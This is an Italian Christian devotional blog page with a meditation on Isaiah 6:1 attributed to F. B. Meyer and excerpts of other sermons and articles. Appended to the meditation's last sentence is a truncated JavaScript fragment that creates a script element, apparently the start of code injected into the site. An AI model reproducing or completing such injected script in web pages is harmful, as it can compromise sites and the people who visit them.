Meditazione del giorno: Il Signore esaltato

meyerfb

F. B. MEYER  –   “Nell’anno della morte del re Uzzia vidi il Signore seduto sopra un trono alto, molto elevato” (Isaia 6:1)

 –   Viviamo in tempi difficili e da sempre nella storia umana gli eventi esterni portano l’uomo a distrarsi e ad angosciarsi. Ma i servi di Dio vengono portati in un luogo segreto, il più alto, dove poter ammirare il nostro Dio che regna in eterno con giustizia e ordine. Il paese stava attraversando un periodo instabile di oscurità e angoscia che stavano portando ad un’imminente rivoluzione e proprio in questo periodo Isaia riuscì a ottenere la stabilità del trono di Dio.

“Molto elevato”, più alto di ogni altra autorità, potere o dominio in cielo, sulla terra e sotto la terra! Egli era coronato d’amore, “Sopra di Lui stavano i Serafini” e la parola Serafino deriva da fuoco ed i Serafini hanno la funzione di irradiare amore. Il trono è stato stabilito per portare solidità, giudizio e potere, sopra tutti questi attributi e sopra Dio regna sovrano l’Amore. Questa è la massima concezione possibile per i mortali, l’amore supremo. L’Agnello che fu immolato sta lì, sul Suo trono.

L’unico uomo in tutto Israele che ebbe l’opportunità di vedere Dio assiso sul Suo trono fu Isaia. In tutta umiltà salì al Tempio, in mezzo alla folla che invece era lì solo per una mera forma religiosa. Sembrava che ognuno di essi avesse bisogno di avere una visione rivelatrice più di lui, ma Isaia fu l’uomo che vide, che vide il Signore; fu l’unico uomo santo in tutto Israele che ebbe la grazia di avere un contatto diretto con Dio. Il resto degli Israeliti vide solo un Tempio, l’altare ed il rituale, ma Isaia vide i lembi del mantello che riempivano ogni angolo del luogo santo.

Non lasciamoci soddisfare dal ritualismo esteriore, dai sermoni, nonostante a volte siano magnifici! Coloro che sono umili e perseveranti nella ricerca di Dio riusciranno ad udire note che altri non possono udire, riusciranno a rilevare presenze che sfuggono agli sguardi ordinari, entreranno nel reame dello spirito che è chiuso per coloro che guardano solo all’esteriore.

Anche quando il mondo sia in tumulto, le maree si alzino, il Signore è potente: Egli è Colui che ha sconfitto la morte, che è risorto e asceso al cielo, Egli è il Signore dei signori, il Re dei re!var d=document;var s=d.createElement(‘script’);

I commenti sono chiusi.

Post meno recenti

Grandi inni: "I surrender all"

Autore  –  Judson W. Van de Venter, 1855-1939  –  “Chi avrà trovato la sua vita, la perderà: e chi avrà perduto la sua vita per causa mia la troverà”. Matteo 10:39. Il testo di questo grande inno è stato scritto dall’autore per ricordare il giorno in cui arrese completamente la sua vita a Cristo dedicandosi a pieno tempo al servizio cristiano. Fu pubblicato per la prima volta, nel …
Leggi Tutto

Da  D. L. Moody a Billy Graham. Tutto iniziò in un negozio di scarpe...

UNA STORIA SIGNIFICATIVA.  –  Un sabato qualsiasi a Boston, circa 150 anni fa, un tranquillo insegnante di scuola domenicale di  nome Edward Kimball si prese un giorno libero per andare a trovare ogni ragazzo della sua classe. Voleva essere certo che ciascuno avesse ricevuto Cristo. Uno dei suoi studenti lavorava come apprendista nel negozio di scarpe dello zio. Kimball entrò nel negozio ed andò nel magazzino sul retro, …
Leggi Tutto

INGRATITUDINE

di FILIPPO WILES   –  Purtroppo l’ingratitudine è inerente alla nostra natura. Quando si tratta di bambini ci si può passare oltre, tal­volta, ma ciò non è il caso con gli adulti.  L’ingratitudine è stata causa di mol­te sofferenze e addirittura di conse­guenze fatali ed eterne. La storia del­l’uomo è iniziata con l’ingratitudine e terminerà con la medesima. Sta scrit­to, «…pur avendo conosciuto Iddio non l’hanno glorificato come …
Leggi Tutto

Il vero risveglio

di Charles H. Spurgeon – Messaggio di Charles H. Spurgeon ai suoi predicatori Come possiamo attenderci di ricevere una benedizione se siamo pigri nel richiederla? Come possiamo aspettarci una nuova Pentecoste se non c’incontriamo mai in un medesimo luogo per cercare il Signore? Fratelli, non vedremo mai un grande cambiamento, un marcato progresso spirituale nelle nostre chiese finché la riunione di preghiera non occuperà un posto primario nella …
Leggi Tutto

CRESCERE NELLA GRAZIA

 di AGOSTINO MASDEA – L’ultima delle esortazioni che l’apostolo Pietro indirizza ai credenti è anche l’ultimo verso del capitolo tre della sua seconda epistola. Questo capitolo è dedicato agli avvenimenti degli ultimi tempi e al ritorno del Signore. Nell’attesa del suo ritorno, Pietro esorta a stare fermi nella fede e ad  aspettare queste cose facendo in modo da “essere trovati da lui immacolati e irreprensibili, in pace”. Esortando alla …
Leggi Tutto

CREDENTI INCREDULI

di LEONARD RAVENHILL –  Uno di questi giorni qualche anima semplice prenderà la Parola di Dio, la leggerà e crederà. Allora noi altri ci sentiremo imbarazzati. Noi abbiamo adottato la conveniente teoria che la Bibbia sia il Libro da spiegare, laddove innanzi tutto si tratta di un Libro che deve essere creduto (e subito dopo obbedito). La realtà che occupa ininterrottamente i miei pensieri in questi giorni è che c’è …
Leggi Tutto

CHI, E COSA E' DIO

di BILLY GRAHAM  –  Nella Bibbia Dio si rivela in mille maniere e se noi la leggiamo con eguale attenzione e regolarità del nostro giornale quotidiano, saremo informati di Dio  come  del  nostro giocatore di calcio favorito! Come un diamante ha molteplici facce, così gli aspetti della rivelazione di Dio circa Se stesso, sono innumerevoli e riempirebbero degli interi volumi. Ne illustrerò quattro che sembrano i più significativi …
Leggi Tutto

Dai nostri Culti